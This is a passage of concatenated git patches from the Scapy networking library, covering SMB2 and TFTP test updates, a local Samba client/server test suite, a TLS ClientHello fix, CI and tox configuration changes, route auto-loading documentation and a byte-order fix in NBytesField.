ctx.ErrorContextData.IPAddrMoveList] == ['192.168.0.105', '192.168.100.143'] + + SMB 2 Setup Session = Setup Session Request @@ -364,8 +378,8 @@ assert netname_dissected.NetName == netname_context.NetName from scapy.layers.ntlm import * setup_sess = NBTSession(b'\x00\x00\x00\xa2\xfeSMB@\x00\x01\x00\x00\x00\x00\x00\x01\x00!\x00\x10\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x19\x00\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00X\x00J\x00\x00\x00\x00\x00\x00\x00\x00\x00`H\x06\x06+\x06\x01\x05\x05\x02\xa0>0<\xa0\x0e0\x0c\x06\n+\x06\x01\x04\x01\x827\x02\x02\n\xa2*\x04(NTLMSSP\x00\x01\x00\x00\x00\x97\x82\x08\xe2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00aJ\x00\x00\x00\x0f') -assert isinstance(setup_sess.Buffer[0][1].innerContextToken.token.mechToken.value, NTLM_NEGOTIATE) -assert setup_sess.Buffer[0][1].innerContextToken.token.mechToken.value.ProductBuild == 19041 +assert isinstance(setup_sess.Buffer[0][1].innerToken.token.mechToken.value, NTLM_NEGOTIATE) +assert setup_sess.Buffer[0][1].innerToken.token.mechToken.value.ProductBuild == 19041 = Setup Session Response @@ -378,7 +392,7 @@ assert setup_sess.Buffer[0][1].token.responseToken.value.Payload[0] == ('TargetN assert setup_sess.Buffer[0][1].token.responseToken.value.Payload[1][1][-1].AvId == 0 -= SMB2 IOCTL Request += SMB2 IOCTL Request - Validate negotiate info ioctl_req = Ether(b'RT\x00\xb6[=\x16\xb4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x009\x00\x00\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x89\x00\x12\x00\x00\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00d\x00\x00\x00x\x00\x16\x00\x90\x00\x00\x00\xb4\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00\x00\x008\x00\x00\x00\x10\x00\x04\x00\x00\x00\x18\x00 \x00\x00\x00DH2Q\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\x1d\xb3\xc8\xfa\r\xed\x11\xb7R\x808\xfb\xd6\xa0~\x18\x00\x00\x00\x10\x00\x04\x00\x00\x00\x18\x00\x00\x00\x00\x00MxAc\x00\x00\x00\x00\x18\x00\x00\x00\x10\x00\x04\x00\x00\x00\x18\x00\x00\x00\x00\x00QFid\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x04\x00\x00\x00\x18\x004\x00\x00\x00RqLs\x00\x00\x00\x00\xc8\x9bA\xdb\x8e\xd1\x19\xf4\\;\x846;\xf6\xca\xe0\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') @@ -411,3 +524,19 @@ assert sess_create_context_response.CreateContexts[0].Data.QueryStatus == 0 assert sess_create_context_response.CreateContexts[1].Data.DiskFileId == 2359297 assert sess_create_context_response.CreateContexts[1].Data.Reserved == b'\x00' * 16 += SMB2 Query Info Response with Security Descriptor + +qr = SMB2_Query_Info_Response(b'\t\x00H\x00\xe0\x00\x00\x00\x01\x00\x14\x9c\x14\x00\x00\x004\x00\x00\x00\x00\x00\x00\x00T\x00\x00\x00\x01\x06\x00\x00\x00\x00\x00\x05P\x00\x00\x00\xb5\x89\xfb8\x19\x84\xc2\xcb\\l#mW\x00wn\xc0\x02d\x87\x01\x06\x00\x00\x00\x00\x00\x05P\x00\x00\x00\xb5\x89\xfb8\x19\x84\xc2\xcb\\l#mW\x00wn\xc0\x02d\x87\x02\x00\x8c\x00\x06\x00\x00\x00\x00\x03\x18\x00\xa9\x00\x12\x00\x01\x02\x00\x00\x00\x00\x00\x0f\x02\x00\x00\x00\x01\x00\x00\x00\x00\x0b\x14\x00\xff\x01\x1f\x00\x01\x01\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x03\x14\x00\xff\x01\x1f\x00\x01\x01\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x03\x14\x00\xff\x01\x1f\x00\x01\x01\x00\x00\x00\x00\x00\x05\x12\x00\x00\x00\x00\x03\x18\x00\xff\x01\x1f\x00\x01\x02\x00\x00\x00\x00\x00\x05 \x00\x00\x00 \x02\x00\x00\x00\x03\x18\x00\xa9\x00\x12\x00\x01\x02\x00\x00\x00\x00\x00\x05 \x00\x00\x00!\x02\x00\x00') +sd = SECURITY_DESCRIPTOR(qr.Output) + +assert sd.OwnerSid.summary() == 'S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464' +assert sd.GroupSid.summary() == 'S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464' + +assert sd.Dacl.toSDDL() == [ + '(A;OI+CI;;;;S-1-15-2-1)', + '(A;OI+CI+IO;;;;S-1-3-0)', + '(A;OI+CI;;;;S-1-1-0)', + '(A;OI+CI;;;;S-1-5-18)', + '(A;OI+CI;;;;S-1-5-32-544)', + '(A;OI+CI;;;;S-1-5-32-545)', +] diff --git a/test/scapy/layers/smbclientserver.uts b/test/scapy/layers/smbclientserver.uts new file mode 100644 index 00000000000..b7d831d5c60 --- /dev/null +++ b/test/scapy/layers/smbclientserver.uts @@ -0,0 +1,342 @@ +% SMB2 Client and Server tests + ++ SMB2 Client tests +~ linux smbclient samba + += Define samba server + +import subprocess + +# Create a temporary directory to serve +TEMP_DIR = pathlib.Path(get_temp_dir()) +TEMP_DIR.chmod(0o0755) +print(TEMP_DIR) + +# Put stuff in it +SHARE_DIR = TEMP_DIR / "share" +SHARE_DIR.mkdir() +SHARE_DIR.chmod(0o0777) +(SHARE_DIR / "fileA").touch() +(SHARE_DIR / "fileB").touch() +(SHARE_DIR / "fileScapy").touch() +(SHARE_DIR / "ignoredFile").symlink_to("fileA") +(SHARE_DIR / "sub").mkdir() +(SHARE_DIR / "sub").chmod(0o0777) +(SHARE_DIR / "sub" / "secret").touch() + +# required for smb.conf to work in standalone without root.. wtf +LOGS_DIR = TEMP_DIR / "logs" +LOCK_DIR = TEMP_DIR / "lock" +PRIVATE_DIR = TEMP_DIR / "private" +PID_DIR = TEMP_DIR / "pid" +CACHE_DIR = TEMP_DIR / "cache" +STATE_DIRECTORY = TEMP_DIR / "state" +NCALRPC_DIR = TEMP_DIR / "ncalrpc" + +for dir in [LOGS_DIR, LOCK_DIR, PRIVATE_DIR, PID_DIR, CACHE_DIR, STATE_DIRECTORY, NCALRPC_DIR]: + dir.mkdir() + +SMBD_LOG = LOGS_DIR / "log.smbd" +SMBD_LOG.touch() + +# smb.conf +CONF_FILE = get_temp_file(autoext=".conf") +CONF = """ +# Scapy unit tests samba server + +[global] + workgroup = WORKGROUP + server role = standalone server + security = user + map to guest = bad user + log level = 1 smb2:5 auth:3 + + bind interfaces only = yes + interfaces = 127.0.0.0/8 + + lock directory = %s + private directory = %s + cache directory = %s + ncalrpc dir = %s + pid directory = %s + state directory = %s + +[test] + comment = Test share + path = %s + guest ok = yes + browseable = yes + read only = no + public = yes +""" % ( + LOCK_DIR, + PRIVATE_DIR, + CACHE_DIR, + NCALRPC_DIR, + PID_DIR, + STATE_DIRECTORY, + SHARE_DIR, +) + +print(CONF) + +with open(CONF_FILE, "w") as fd: + fd.write(CONF) + +# define server context manager + +class run_smbserver: + def __init__(self): + self.proc = None + + def __enter__(self): + # Empty log + with SMBD_LOG.open('w') as fd: + fd.write("") + print("@ Starting smbd server") + # Start server + self.proc = subprocess.Popen(["/usr/sbin/smbd", "-F", "-p", "12345", "-s", CONF_FILE, "-l", LOGS_DIR]) + # wait for it to start + for i in range(10): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(1) + try: + sock.connect(("127.0.0.1", 12345)) + break + except Exception: + time.sleep(0.5) + finally: + sock.close() + else: + raise TimeoutError + print("@ Server started !") + + def __exit__(self, exc_type, exc_value, traceback): + print("@ Stopping smbd server !") + self.proc.terminate() + self.proc.wait() + if traceback: + # failed + print("\nTest failed. Smbd logs:") + with SMBD_LOG.open('r') as fd: + print(fd.read()) + print("@ smbd server stopped !") + + + +# define client + +def run_smbclient(): + return smbclient("localhost", "guest", port=12345, guest=True, cli=False, debug=4) + + += smbclient: connect then list shares + +with run_smbserver(): + try: + cli = run_smbclient() + results = cli.shares() + print(results) + assert ('test', 'DISKTREE', 'Test share') in results + assert any(x[0] == "IPC$" for x in results) + finally: + cli.close() + += smbclient: connect to test share and list files + +with run_smbserver(): + try: + cli = run_smbclient() + cli.use("test") + files = cli.ls() + names = [x[0] for x in files] + assert all(x in names for x in ['.', '..', 'sub', 'fileB', 'fileScapy', 'fileA']) + finally: + cli.close() + += smbclient: connect to test share and get file + +LOCALPATH = pathlib.Path(get_temp_dir()) + +with run_smbserver(): + try: + cli = run_smbclient() + cli.use("test") + cli.lcd(str(LOCALPATH)) + completions = cli.get_complete("file") + assert all(x in completions for x in ['fileA', 'fileB']) + cli.get('fileA') + assert (LOCALPATH / "fileA").exists() + assert [x.name for x in cli.lls()] == ['fileA'] + finally: + cli.close() + += smbclient: connect to test share, cd, put file and cat it + +LOCALPATH = pathlib.Path(get_temp_dir()) +with (LOCALPATH / "fileC").open("w") as fd: + fd.write("Nice\nData") + +with run_smbserver(): + try: + cli = run_smbclient() + cli.use("test") + cli.lcd(str(LOCALPATH)) + cli.cd("sub") + # upload + cli.put('fileC') + # check completion + completions = cli.get_complete("") + assert all(x in completions for x in ['secret', 'fileC']) + # cat + assert cli.cat('fileC') == b'Nice\nData' + # check on disk + with (SHARE_DIR / "sub" / "fileC").open("r") as fd: + assert fd.read() == "Nice\nData" + finally: + cli.close() + ++ SMB2 Server tests +~ linux smbserver samba + += Define Scapy smb server + +import subprocess +import select + +ROOTPATH = pathlib.Path(get_temp_dir()) + +# Populate with stuff +(ROOTPATH / "fileA").touch() +(ROOTPATH / "fileB").touch() +(ROOTPATH / "fileScapy").touch() +(ROOTPATH / "sub").mkdir() +(ROOTPATH / "sub" / "secret").touch() + +# content +with (ROOTPATH / "fileScapy").open("w") as fd: + fd.write("Nice\nData") + +class run_smbserver: + def __init__(self, guest=False): + self.srv = None + self.guest = guest + + def __enter__(self): + if self.guest: + IDENTITIES = None + else: + IDENTITIES = { + "User1": MD4le("Password1"), + "Administrator": MD4le("Password2") + } + self.srv = smbserver( + shares=[SMBShare("Scapy", ROOTPATH), SMBShare("test", ROOTPATH)], + iface=conf.loopback_name, + debug=4, + port=12345, + bg=True, + # NTLMSSP + IDENTITIES=IDENTITIES, + ) + + def __exit__(self, exc_type, exc_value, traceback): + self.srv.close() + + +# define client + +class run_smbclient: + def __init__(self, user=None, password=None, share=None, list=False, cwd=None, debug=None): + args = [ + "smbclient", + ] + (["-L"] if list else []) + [ + "//127.0.0.1%s" % (("/%s" % share) if share else ""), + "-p", "12345", + ] + if user and password: + args.extend([ + "-U", + "DOMAIN/%s" % user, + "--password", + password, + ]) + else: + args.append("-N") + self.args = args + self.proc = subprocess.Popen( + args, + text=True, + bufsize=0, + stdin=subprocess.PIPE, + stdout=subprocess.PIPE, + stderr=subprocess.STDOUT, + cwd=cwd, + ) + self.output = "" + def cmd(self, command): + # send command + self.proc.stdin.write(command + "\n") + self.proc.stdin.flush() + def getoutput(self): + self.output += self.proc.communicate(input="exit\n", timeout=10)[0] + return [x.strip() for x in self.output.split("\n") if x.strip()] + def close(self): + if self.proc.poll(): + self.proc.terminate() + def printdebug(self): + # Print stuff + print("\nTest failed.") + print("smbclient arguments:", self.args) + print("smbclient output:") + print(self.output) + += smbserver: connect then list shares + +with run_smbserver(guest=True): + try: + cli = run_smbclient(list=True) + output = cli.getoutput() + shares = [x[0] for x in (y.split(" ") for y in output if "Disk" in y)] + assert shares == ['Scapy', 'test'] + except Exception: + cli.printdebug() + raise + finally: + cli.close() + += smbserver: connect then ls + +with run_smbserver(): + try: + cli = run_smbclient(user="Administrator", password="Password2", share="test") + cli.cmd("ls") + output = cli.getoutput()[1:] + files = [x[0] for x in (y.split(" ") for y in output if "blocks" not in y)] + print(files) + assert files == ['.', 'fileA', 'fileB', 'fileScapy', 'sub'] + except Exception: + cli.printdebug() + raise + finally: + cli.close() + += smbserver: connect then get file + +LOCALPATH = pathlib.Path(get_temp_dir()) + +with run_smbserver(): + try: + cli = run_smbclient(user="Administrator", password="Password2", share="test", cwd=LOCALPATH) + cli.cmd("get fileScapy") + output = cli.getoutput() + print(output) + assert "size 9" in output[0], "no size" + assert (LOCALPATH / "fileScapy").exists(), "file doesn't exist" + with (LOCALPATH / "fileScapy").open("r") as fd: + assert fd.read() == "Nice\nData", "invalid data" + except Exception: + cli.printdebug() + raise + finally: + cli.close() diff --git a/test/tftp.uts b/test/tftp.uts index 5c91caac314..5ad435060a9 100644 --- a/test/tftp.uts +++ b/test/tftp.uts @@ -22,29 +22,26 @@ assert TFTP_OACK().answers(TFTP_WRQ()) = Utilities ~ linux -legacy_select_objects = None -def patch_select_objects(classname): - global legacy_select_objects - legacy_select_objects = select_objects - def mock_select_objects(inputs, remain): - test = [s for s in inputs if isinstance(s, classname)] - if test: - if len(test[0].packets): - return test - else: - inputs = [s for s in inputs if not isinstance(s, classname)] - return legacy_select_objects(inputs, remain) - scapy.automaton.select_objects = mock_select_objects +from scapy.automaton import select_objects class MockTFTPSocket(object): packets = [] - def recv(self, n): + def recv(self, n=None): pkt = self.packets.pop(0) return pkt def send(self, *args, **kargs): pass def close(self): pass + @classmethod + def select(classname, inputs, remain): + test = [s for s in inputs if isinstance(s, classname)] + if test: + if len(test[0].packets): + return test + else: + inputs = [s for s in inputs if not isinstance(s, classname)] + return select_objects(inputs, remain) = TFTP_read() automaton @@ -54,14 +51,11 @@ class MockReadSocket(MockTFTPSocket): packets = [IP(src="1.2.3.4") / UDP(dport=0x2807) / TFTP_DATA(block=1) / ("P" * 512), IP(src="1.2.3.4") / UDP(dport=0x2807) / TFTP_DATA(block=2) / "<3"] -patch_select_objects(MockReadSocket) - tftp_read = TFTP_read("file.txt", "1.2.3.4", sport=0x2807, ll=MockReadSocket, - recvsock=MockReadSocket) + recvsock=MockReadSocket, debug=5) res = tftp_read.run() -scapy.automaton.select_objects = legacy_select_objects assert res == (b"P" * 512 + b"<3") = TFTP_read() automaton error @@ -70,8 +64,6 @@ assert res == (b"P" * 512 + b"<3") class MockReadSocket(MockTFTPSocket): packets = [IP(src="1.2.3.4") / UDP(dport=0x2807) / TFTP_ERROR(errorcode=2, errormsg="Fatal error")] -patch_select_objects(MockReadSocket) - tftp_read = TFTP_read("file.txt", "1.2.3.4", sport=0x2807, ll=MockReadSocket, recvsock=MockReadSocket) @@ -83,7 +75,6 @@ except Automaton.ErrorState as e: assert "Reached ERROR" in str(e) assert "ERROR Access violation" in str(e) -scapy.automaton.select_objects = legacy_select_objects = TFTP_write() automaton ~ linux @@ -102,9 +93,7 @@ tftp_write = TFTP_write("file.txt", "P" * 767 + "Scapy <3", "1.2.3.4", sport=0x2 ll=MockWriteSocket, recvsock=MockWriteSocket) -patch_select_objects(MockWriteSocket) tftp_write.run() -scapy.automaton.select_objects = legacy_select_objects assert data_received == (b"P" * 767 + b"Scapy <3") = TFTP_write() automaton error @@ -117,7 +106,6 @@ tftp_write = TFTP_write("file.txt", "P" * 767 + "Scapy <3", "1.2.3.4", sport=0x2 ll=MockWriteSocket, recvsock=MockWriteSocket) -patch_select_objects(MockWriteSocket) try: tftp_write.run() assert False @@ -125,7 +113,6 @@ except Automaton.ErrorState as e: assert "Reached ERROR" in str(e) assert "ERROR Access violation" in str(e) -scapy.automaton.select_objects = legacy_select_objects = TFTP_WRQ_server() automaton ~ linux @@ -138,9 +125,7 @@ class MockWRQSocket(MockTFTPSocket): tftp_wrq = TFTP_WRQ_server(ip="1.2.3.4", sport=0x2807, ll=MockWRQSocket, recvsock=MockWRQSocket) -patch_select_objects(MockWRQSocket) assert tftp_wrq.run() == (b"scapy.txt", (b"P" * 512 + b"<3")) -scapy.automaton.select_objects = legacy_select_objects = TFTP_WRQ_server() automaton with options ~ linux @@ -153,9 +138,7 @@ class MockWRQSocket(MockTFTPSocket): tftp_wrq = TFTP_WRQ_server(ip="1.2.3.4", sport=0x2807, ll=MockWRQSocket, recvsock=MockWRQSocket) -patch_select_objects(MockWRQSocket) assert tftp_wrq.run() == (b"scapy.txt", (b"P" * 100 + b"<3")) -scapy.automaton.select_objects = legacy_select_objects = TFTP_RRQ_server() automaton ~ linux @@ -184,9 +167,7 @@ class MockRRQSocket(MockTFTPSocket): tftp_rrq = TFTP_RRQ_server(ip="1.2.3.4", sport=0x2807, dir="/tmp/", serve_one=True, ll=MockRRQSocket, recvsock=MockRRQSocket) -patch_select_objects(MockRRQSocket) tftp_rrq.run() -scapy.automaton.select_objects = legacy_select_objects assert received_data == sent_data import os diff --git a/tox.ini b/tox.ini index dd282e510f2..29860fa39f0 100644 --- a/tox.ini +++ b/tox.ini @@ -97,7 +97,7 @@ skip_install = true changedir = {toxinidir}/doc/scapy deps = sphinx commands = - sphinx-apidoc -f --no-toc -d 1 --separate --module-first --templatedir=_templates --output-dir api ../../scapy ../../scapy/modules/ ../../scapy/libs/ ../../scapy/tools/ ../../scapy/arch/ ../../scapy/contrib/scada/* ../../scapy/all.py ../../scapy/layers/all.py ../../scapy/compat.py + sphinx-apidoc -f --no-toc -d 1 --separate --module-first --templatedir=_templates --output-dir api ../../scapy ../../scapy/modules/ ../../scapy/libs/ ../../scapy/tools/ ../../scapy/arch/ ../../scapy/contrib/scada/* ../../scapy/layers/msrpce/raw/ ../../scapy/layers/msrpce/all.py ../../scapy/all.py ../../scapy/layers/all.py ../../scapy/compat.py [testenv:mypy] @@ -125,6 +125,7 @@ description = "Build the docs without rebuilding the API tree" skip_install = true changedir = {toxinidir}/doc/scapy deps = {[testenv:docs]deps} +allowlist_externals = sphinx-build setenv = SCAPY_APITREE = 0 commands = @@ -170,7 +171,7 @@ commands = flake8 scapy/ # flake8 configuration [flake8] -ignore = E731, W504 +ignore = E203, E731, W504, W503 max-line-length = 88 per-file-ignores = scapy/all.py:F403,F401 @@ -189,4 +190,5 @@ per-file-ignores = scapy/layers/tls/crypto/md4.py:E741 scapy/libs/winpcapy.py:F405,F403,E501 scapy/tools/UTscapy.py:E501 -exclude = scapy/libs/ethertypes.py +exclude = scapy/libs/ethertypes.py, + scapy/layers/msrpce/raw/* From a1479562de70dae0d07e769546d51509335f1f8e Mon Sep 17 00:00:00 2001 From: Loris1123 Date: Fri, 2 Feb 2024 21:34:02 +0100 Subject: [PATCH 1164/1632] Fixes an issue, where TLSClientHello extensions were overwritten --- scapy/layers/tls/automaton_cli.py | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/scapy/layers/tls/automaton_cli.py b/scapy/layers/tls/automaton_cli.py index e5d5b2465bd..c84826e73f6 100644 --- a/scapy/layers/tls/automaton_cli.py +++ b/scapy/layers/tls/automaton_cli.py @@ -292,16 +292,16 @@ def should_add_ClientHello(self): p = self.client_hello else: p = TLSClientHello() - ext = [] - # Add TLS_Ext_SignatureAlgorithms for TLS 1.2 ClientHello - if self.cur_session.advertised_tls_version == 0x0303: - ext += [TLS_Ext_SignatureAlgorithms(sig_algs=["sha256+rsa"])] - # Add TLS_Ext_ServerName - if self.server_name: - ext += TLS_Ext_ServerName( - servernames=[ServerName(servername=self.server_name)] - ) - p.ext = ext + ext = [] + # Add TLS_Ext_SignatureAlgorithms for TLS 1.2 ClientHello + if self.cur_session.advertised_tls_version == 0x0303: + ext += [TLS_Ext_SignatureAlgorithms(sig_algs=["sha256+rsa"])] + # Add TLS_Ext_ServerName + if self.server_name: + ext += TLS_Ext_ServerName( + servernames=[ServerName(servername=self.server_name)] + ) + p.ext = ext self.add_msg(p) raise self.ADDED_CLIENTHELLO() From b2f3587cf7111c544a74ea4b03c096d6d81ea856 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 1 Feb 2024 11:37:19 +0100 Subject: [PATCH 1165/1632] Fix coverage tests on MacOS --- .config/ci/install.sh | 5 ----- .config/ci/test.sh | 20 ++++++++++++++++---- 2 files changed, 16 insertions(+), 9 deletions(-) diff --git a/.config/ci/install.sh b/.config/ci/install.sh index 11b6fcc3415..b4f4daa32c0 100755 --- a/.config/ci/install.sh +++ b/.config/ci/install.sh @@ -45,9 +45,4 @@ python -m pip install --upgrade pip setuptools wheel --ignore-installed python -m pip install -U tox --ignore-installed # Dump Environment (so that we can check PATH, UT_FLAGS, etc.) -openssl version -if [ "$OSTYPE" = "linux-gnu" ] -then - smbclient -V -fi set diff --git a/.config/ci/test.sh b/.config/ci/test.sh index 93c1c79a24d..7da89300579 100755 --- a/.config/ci/test.sh +++ b/.config/ci/test.sh @@ -7,7 +7,7 @@ # ./test.sh 3.7 both # ./test.sh 3.9 non_root -if [ "$OSTYPE" = "linux-gnu" ] || [ "$TRAVIS_OS_NAME" = "linux" ] +if [ "$OSTYPE" = "linux-gnu" ] then # Linux OSTOX="linux" @@ -18,13 +18,13 @@ then sudo modprobe -n -v vcan if [[ $? -ne 0 ]] then - # The vcan module is currently unavailable on Travis-CI xenial builds + # The vcan module is currently unavailable on xenial builds UT_FLAGS+=" -K vcan_socket" fi else UT_FLAGS+=" -K vcan_socket" fi -elif [[ "$OSTYPE" = "darwin"* ]] || [ "$TRAVIS_OS_NAME" = "osx" ] || [[ "$OSTYPE" = "FreeBSD" ]] || [[ "$OSTYPE" = *"bsd"* ]] +elif [[ "$OSTYPE" = "darwin"* ]] || [[ "$OSTYPE" = "FreeBSD" ]] || [[ "$OSTYPE" = *"bsd"* ]] then OSTOX="bsd" # Travis CI in macOS 10.13+ can't load kexts. Need this for tuntaposx. @@ -57,6 +57,11 @@ then export DISABLE_COVERAGE=" " fi +# macos -k scanner has glitchy coverage. skip it +if [ "$OSTOX" = "bsd" ] && [[ "$UT_FLAGS" = *"-k scanner"* ]]; then + export DISABLE_COVERAGE=" " +fi + # libpcap if [[ ! -z "$SCAPY_USE_LIBPCAP" ]]; then UT_FLAGS+=" -K veth" @@ -98,11 +103,18 @@ fi # Configure OpenSSL export OPENSSL_CONF=$(${PYTHON:=python} `dirname $BASH_SOURCE`/openssl.py) -# Dump vars (the others were already dumped in install.sh) +# Dump vars (environment is already entirely dumped in install.sh) +echo OSTOX=$OSTOX echo UT_FLAGS=$UT_FLAGS echo TOXENV=$TOXENV echo OPENSSL_CONF=$OPENSSL_CONF echo OPENSSL_VER=$(openssl version) +echo COVERAGE=$([ -z "$DISABLE_COVERAGE" ] && echo "enabled" || echo "disabled") + +if [ "$OSTYPE" = "linux-gnu" ] +then + echo SMBCLIENT=$(smbclient -V) +fi # Launch Scapy unit tests TOX_PARALLEL_NO_SPINNER=1 tox -- ${UT_FLAGS} || exit 1 From 15562892eb7b069e435de2543ce89d4f710fd97f Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sat, 3 Feb 2024 15:28:07 +0100 Subject: [PATCH 1166/1632] Allow to disable auto-loading of routes --- doc/scapy/usage.rst | 33 +++++++++++++++++++++++++++++++++ scapy/config.py | 6 ++++++ scapy/route.py | 4 +++- scapy/route6.py | 9 ++++++--- 4 files changed, 48 insertions(+), 4 deletions(-) diff --git a/doc/scapy/usage.rst b/doc/scapy/usage.rst index c98836aa0d7..af2e3a8bbf2 100644 --- a/doc/scapy/usage.rst +++ b/doc/scapy/usage.rst @@ -1794,6 +1794,39 @@ There are quite a few ways of speeding up scapy's dissection. You can use all of # Disable filtering: restore everything to normal conf.layers.unfilter() +Very slow start because of big routes +------------------------------------- + +Problem +^^^^^^^ + +Scapy takes ages to start because you have very big routing tables. + +Solution +^^^^^^^^ + +Disable the auto-loading of the routing tables: + +**CLI:** in ``~/.config/scapy/prestart.py`` add: + +.. code:: python + + conf.route_autoload = False + conf.route6_autoload = False + +**Programmatically:** + +.. code:: python + + # Before any other Scapy import + from scapy.config import conf + conf.route_autoload = False + conf.route6_autoload = False + # Import Scapy here + from scapy.all import * + +At anytime, you can trigger the routes loading using ``conf.route.resync()`` or ``conf.route6.resync()``, or add the routes yourself `as shown here <#routing>`_. + OS Fingerprinting ----------------- diff --git a/scapy/config.py b/scapy/config.py index bccbd557837..3bcdde997a8 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -970,6 +970,12 @@ class Conf(ConfClass): neighbor = None # type: 'scapy.layers.l2.Neighbor' #: holds the name servers IP/hosts used for custom DNS resolution nameservers = None # type: str + #: automatically load IPv4 routes on startup. Disable this if your + #: routing table is too big. + route_autoload = True + #: automatically load IPv6 routes on startup. Disable this if your + #: routing table is too big. + route6_autoload = True #: holds the Scapy IPv4 routing table and provides methods to #: manipulate it route = None # type: 'scapy.route.Route' diff --git a/scapy/route.py b/scapy/route.py index a811aff9e0f..9304be793d6 100644 --- a/scapy/route.py +++ b/scapy/route.py @@ -32,7 +32,9 @@ class Route: def __init__(self): # type: () -> None self.routes = [] # type: List[Tuple[int, int, str, str, str, int]] - self.resync() + self.invalidate_cache() + if conf.route_autoload: + self.resync() def invalidate_cache(self): # type: () -> None diff --git a/scapy/route6.py b/scapy/route6.py index 82ff58584d5..dd86b26ca6b 100644 --- a/scapy/route6.py +++ b/scapy/route6.py @@ -40,8 +40,11 @@ class Route6: def __init__(self): # type: () -> None - self.resync() + self.routes = [] # type: List[Tuple[str, int, str, str, List[str], int]] # noqa: E501 + self.ipv6_ifaces = set() # type: Set[Union[str, NetworkInterface]] self.invalidate_cache() + if conf.route6_autoload: + self.resync() def invalidate_cache(self): # type: () -> None @@ -50,8 +53,8 @@ def invalidate_cache(self): def flush(self): # type: () -> None self.invalidate_cache() - self.ipv6_ifaces = set() # type: Set[Union[str, NetworkInterface]] - self.routes = [] # type: List[Tuple[str, int, str, str, List[str], int]] # noqa: E501 + self.routes.clear() + self.ipv6_ifaces.clear() def resync(self): # type: () -> None From d36f23c2bf1d3afb76e9a6ebfb085c2ef23be6f0 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Thu, 2 Feb 2023 02:11:26 +0000 Subject: [PATCH 1167/1632] Make m2i match i2m in NBytesField Closes https://github.com/secdev/scapy/issues/3876 --- scapy/fields.py | 2 +- test/contrib/stun.uts | 8 ++++---- test/fields.uts | 8 ++++++++ test/scapy/layers/bluetooth.uts | 2 +- 4 files changed, 14 insertions(+), 6 deletions(-) diff --git a/scapy/fields.py b/scapy/fields.py index 39ae2f6667b..296a23a3ead 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -1134,7 +1134,7 @@ def m2i(self, pkt, x): return x # x can be a tuple when coming from struct.unpack (from getfield) if isinstance(x, (list, tuple)): - return sum(d * (256 ** i) for i, d in enumerate(x)) + return sum(d * (256 ** i) for i, d in enumerate(reversed(x))) return 0 def i2repr(self, pkt, x): diff --git a/test/contrib/stun.uts b/test/contrib/stun.uts index 2a22a690248..51e2249ae06 100644 --- a/test/contrib/stun.uts +++ b/test/contrib/stun.uts @@ -32,7 +32,7 @@ assert parsed.attributes == [ STUNPriority(priority=1847591167), STUNIceControlling(tie_breaker=0x1b0ab98b6e8effa6), STUNUsername(length=37, username="oNph:Ht11MaRZHc4GOLJUsbu1R3YCs72HYN25"), - STUNMessageIntegrity(hmac_sha1=0x77e7f03e7f9e1996be42339159db1f682147bcfc), + STUNMessageIntegrity(hmac_sha1=0xfcbc4721681fdb59913342be96199e7f3ef0e777), STUNFingerprint(crc_32=0x8718c3a4) ] @@ -59,7 +59,7 @@ assert parsed.attributes == [ STUNIceControlling(tie_breaker=0xa696819e91c937da), STUNUseCandidate(), STUNPriority(priority=1845501695), - STUNMessageIntegrity(hmac_sha1=0x5fbd89b9c76b674db13a433112f3e0b1faaa87c1), + STUNMessageIntegrity(hmac_sha1=0xc187aafab1e0f31231433ab14d676bc7b989bd5f), STUNFingerprint(crc_32=0xc9566cfc) ] @@ -79,7 +79,7 @@ assert parsed.magic_cookie == 0x2112A442 assert parsed.transaction_id == 0xcfacb2a43aa2de5a9d56d85a, parsed.transaction_id assert parsed.attributes == [ STUNXorMappedAddress(xport=40480, xip="172.20.0.42"), - STUNMessageIntegrity(hmac_sha1=0x7d968d4241fa89d8e3f8ffe302c8975823c91fb7), + STUNMessageIntegrity(hmac_sha1=0xb71fc9235897c802e3fff8e3d889fa41428d967d), STUNFingerprint(crc_32=0xea9b6559) ] @@ -103,7 +103,7 @@ assert parsed.attributes[0] == STUNXorMappedAddress(xport=25000, xip="172.20.0.2 assert parsed.attributes == [ STUNXorMappedAddress(xport=25000, xip="172.20.0.200"), STUNUsername(length=37, username="Ht11MaRZHc4GOLJUsbu1R3YCs72HYN25:oNph"), - STUNMessageIntegrity(hmac_sha1=0x317065df81598d6cc8ca3bd684ca65fb6d03674b), + STUNMessageIntegrity(hmac_sha1=0x4b67036dfb65ca84d63bcac86c8d5981df657031), STUNFingerprint(crc_32=0x4041e9c3) ] diff --git a/test/fields.uts b/test/fields.uts index ae66d1095bf..dd90c01948b 100644 --- a/test/fields.uts +++ b/test/fields.uts @@ -204,6 +204,14 @@ class 